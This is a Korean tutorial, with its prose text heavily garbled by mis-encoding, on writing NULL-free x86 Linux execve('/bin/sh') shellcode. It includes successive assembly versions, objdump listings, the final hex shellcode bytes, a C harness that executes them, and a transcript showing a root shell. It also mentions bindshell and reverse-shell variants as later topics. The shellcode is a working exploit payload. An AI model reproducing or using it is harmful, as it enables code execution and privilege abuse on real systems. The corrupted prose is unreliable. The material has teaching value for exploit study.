ٷ   \00 Ÿ ̴. ׷, ϴ XOR  ̿Ͽ %eax
  0 ٲپ .

"xor %eax %eax"

    %eax   0 Ǿ. ֳ ռ  ٿ
   ڰ  ٸ xor    0 Ǳ ̴.

׷   %eax  1Ʈ \x0b  ִ ̴.  
 ɵ  Ʈ  ϰ   .

츮 ݱ mov   ,  movl̶ ڿ l ٿ 
ߴ.   l longword. , 4Ʈ ǹϸ, l ̿ܿ w b  
Ѵ. , movw  ϸ 2Ʈ movϰ ǰ,  movb
 ϸ  1Ʈ movϰ ȴ. ,    ˾
%eax  κп  \x0b     ̴.

"xor %eax %eax" <- %eax  0 ٲ ..
"movb $0x0b %eax" <- %eax  Ʈ \x0b ִ´.

 \x00 ϴ  ɵ鵵    Ͽ  .

*  ڵ 
==============================================================
.globl main
main:
		jmp     come_here
func:
		movl    $0x0b, %eax
		popl    %ebx
		movl    %ebx, (%esi)
		movl    $0x00, 0x4(%esi)
		leal    (%esi), %ecx
		movl    $0x00, %edx
		int     $0x80
		movl    $0x01, %eax
		movl    $0x00, %ebx
		int     $0x80

come_here:
		calll func
		.string "/bin/sh\00"
==============================================================

*  ڵ
==============================================================
.globl main
main:
                jmp     come_here
func:
                xor     %eax, %eax
                movb    $0x0b, %eax
                popl    %ebx
                movl    %ebx, (%esi)
                xor     0x4(%esi), 0x4(%esi)
                leal    (%esi), %ecx
                xor     %edx, %edx
                int     $0x80
                xor     %eax, %eax
                movb    $0x01, %eax
                xor     %ebx, %ebx
                int     $0x80

come_here:
                calll func
                .string "/bin/sh\00"
==============================================================

⼭    µ, װ ٷ xor 0x4(%esi), 0x4(%esi)
κ̴. ̷     ʱ ̴. 
׷ ̷ κ  ذ  ?  ϴ. 0 
ִ  ϳ ͼ ϴ ̴. xor 0x4(%esi), 0x4(%esi)
ٷ  ٿ 0  ͸ ϳ  , װ movl.

xor     0x4(%esi), 0x4(%esi)
--->
xor		%esp, %esp
movl	%esp, 0x4(%esi)

 ϼ   .

==============================================================
.globl main
main:
                jmp     come_here
func:
                xor     %eax, %eax
                movb    $0x0b, %eax
                popl    %ebx
                movl    %ebx, (%esi)
                xor		%esp, %esp
				movl	%esp, 0x4(%esi)
                leal    (%esi), %ecx
                xor     %edx, %edx
                int     $0x80
                xor     %eax, %eax
                movb    $0x01, %eax
                xor     %ebx, %ebx
                int     $0x80

come_here:
                calll func
                .string "/bin/sh\00"
==============================================================

 100% ϺѰ? ƴϴ. /bin/sh ٷ ڿ \x00  ϳ ִ.
̰  0x4(%esi) ٲ Ͱ   ذ  ִ.
ϴ, .string ִ \00  ,   ڵ带 Ѵ.

popl    %ebx
--->
popl	%ebx
xor		%esp, %esp
movl	%esp, 0x7(%ebx)

"/bin/sh"  ̰ 7 Ʈ̱  ׸ŭ  κп 0 ־.

̷ν,    NULL  ʴ  ڵ带 ϼϿ.
   ڵ带 ϰ, ϼ  objdump  
غ.

=========================================================================
...  ...
080483d0 <main>:
 80483d0:       eb 1f                   jmp    80483f1 <come_here>

080483d2 <func>:
 80483d2:       31 c0                   xor    %eax,%eax
 80483d4:       b0 0b                   mov    $0xb,%al
 80483d6:       5b                      pop    %ebx
 80483d7:       31 e4                   xor    %esp,%esp
 80483d9:       89 63 07                mov    %esp,0x7(%ebx)
 80483dc:       89 1e                   mov    %ebx,(%esi)
 80483de:       31 e4                   xor    %esp,%esp
 80483e0:       89 66 04                mov    %esp,0x4(%esi)
 80483e3:       8d 0e                   lea    (%esi),%ecx
 80483e5:       31 d2                   xor    %edx,%edx
 80483e7:       cd 80                   int    $0x80
 80483e9:       31 c0                   xor    %eax,%eax
 80483eb:       b0 01                   mov    $0x1,%al
 80483ed:       31 db                   xor    %ebx,%ebx
 80483ef:       cd 80                   int    $0x80

080483f1 <come_here>:
 80483f1:       e8 dc ff ff ff          call   80483d2 <func>
 80483f6:       2f                      das
 80483f7:       62 69 6e                bound  %ebp,0x6e(%ecx)
 80483fa:       2f                      das
 80483fb:       73 68                   jae    8048465 <_IO_stdin_used+0x1>
===========================================================================

,    NULL(0x00)  ʴ´.   Ϻ  
ڵ尡   , ݱ  ظ  ϸ ڵ带
  ҽ ټ ȿ̰, ݺ κе ִ. , 
ռ  ڵ带   ϰ   ϰڴ.
, ڵ  α׷    Ǿ ϴ 찡
  ڵ      ݿ ϴ. 
   Exploit Ʈ hack.co.za  ª ڵ 
׽Ʈ   Ŀ ̿ ª ڵ   
̷ο  Ǳ⵵ Ѵ. ,  ǥ ڵ   ª 
  22Ʈ̴.

 ڵ 쿣 45Ʈ ϰ ִµ,  ڵ带 ణ 
Ͽ   õ ڵ Ѻ .

=============================================================================
080483d0 <main>:
 80483d0:       eb 15                   jmp    80483e7 <come_here>
080483d2 <func>:
 80483d2:       31 c0                   xor    %eax,%eax
 80483d4:       5b                      pop    %ebx
 80483d5:       89 43 07                mov    %eax,0x7(%ebx)
 80483d8:       89 1e                   mov    %ebx,(%esi)
 80483da:       89 46 04                mov    %eax,0x4(%esi)
 80483dd:       b0 0b                   mov    $0xb,%al
 80483df:       31 e4                   xor    %esp,%esp
 80483e1:       8d 0e                   lea    (%esi),%ecx
 80483e3:       31 d2                   xor    %edx,%edx
 80483e5:       cd 80                   int    $0x80

080483e7 <come_here>:
 80483e7:       e8 e6 ff ff ff          call   80483d2 <func>
 80483ec:       2f                      das
 80483ed:       62 69 6e                bound  %ebp,0x6e(%ecx)
 80483f0:       2f                      das
 80483f1:       73 68                   jae    804845b <gcc2_compiled.+0x1b>
=============================================================================

, 10Ʈ  ҵǾ. xor ڵ尡 ߺ  ּȭ װ, exit(0)
κ Ÿ ״. ֳϸ, /bin/sh Ǹ鼭 ο ޸ 
̵Ǳ  exit(0)    ʿ䰡 ,    
exit  ϱ   exit(0) ־ ʿ䰡  ̴.

׷, ݱ   16 · ޿ ̾.

\xeb\x15\x31\xc0\x5b\x89\x43\x07\x89\x1e\x89\x46\x04\xb0\x0b\x31\xe4\x8d\x0e
\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68  

̰ ϼ ڵ̴.   ٸ α׷ ȿ  ۵
ϴ Ȯ غ.

=========================================================================
char code[] = "\xeb\x15\x31\xc0\x5b\x89\x43\x07\x89\x1e\x89\x46\x04"
			"\xb0\x0b\x31\xe4\x8d\x0e\x31\xd2\xcd\x80\xe8\xe6\xff"
			"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main()
{
        void (*pointer)(void);
        pointer = (void *)code;
        pointer();
}
=========================================================================

=========================================================================
[root@hackerschool assem]# gcc -o shell shell.c
[root@hackerschool assem]# ./shell
sh-2.05a# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-2.05a# exit
exit
[root@hackerschool assem]#
=========================================================================

̴. ̷ν ڵ Ⱑ . ,  ڵ /bin/sh 
Ű    . ֳϸ   7.0 Ŀ, /bin/sh(bash) 
鵵 Ǵ  ϱ  /bin/sh   α׷ 
 ƴ, α׷ Ų   Ǳ ̴.
 mirable̶ ڰ root   ŷϿ /bin/sh ϸ,
root ƴ, mirable    ȴ.
,    Ű  setreuid(0,0); ȣν 
 ذ  ִ. ó, /bin/sh  chroot(), ڵ  ͸
 ȸϴ ڵ. Ȥ, Ʈ ȯ 󿡼   ִ bindshell, 
reverse telnet ڵ   ڵ忡 ؼ  ɵְ ٷ 
 ϰ,  ´  ⺻ ڵ ⸦  ϰ 뿡
ġ ϰڴ. 
